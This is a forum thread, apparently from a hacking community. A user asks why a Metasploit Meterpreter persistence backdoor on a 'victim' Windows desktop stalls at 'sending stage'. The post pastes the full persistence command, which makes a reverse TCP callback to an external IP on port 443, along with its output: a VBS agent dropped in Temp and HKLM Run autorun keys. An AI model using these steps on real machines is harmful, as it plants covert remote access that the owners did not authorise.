Forum Thread: After Using Meterpreter Persistence on Victim, Always Stuck on Sending Stage?

I am using my desktop at another location to try and get persistence working. I started the meterpreter session, ran the persistence, it installed, successfully, said something about installing to the registry and stuff and then took me back to meterpreter.

I did it using port 443 and my external IP. and I was listening on that same port, and when I turned on my desktop, it says sending stage, but never connects to the meterpreter session. Any idea why? It does connect on port 443 as if i double click my payload it does connect. So neither isp is blocking it, the desktop has no AV, so not sure. Any ideas?

I pasted below what the meterpreter persistence command did when I ran it.

meterpreter > run persistence -A -X 30 -p 443 -r 64.57.178.xx
* Running Persistance Script
* Resource file for cleanup created at /root/.msf4/logs/persistence/O780-PC20160330.2701/O780-PC20160330.2701.rc
* Creating Payload=windows/meterpreter/reversetcp LHOST=64.57.178.xx LPORT=443
* Persistent agent script is 148500 bytes long

  • Persistent Script written to C:\Users\DELLUS~1\AppData\Local\Temp\WvyKajs.vbs

Starting connection handler at port 443 for windows/meterpreter/reversetcp

  • exploit/multi/handler started!

Executing script C:\Users\DELLUS~1\AppData\Local\Temp\WvyKajs.vbs

  • Agent executed with PID 3080

Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OFPvRUHLBGZu

  • Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OFPvRUHLBGZu

meterpreter >

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active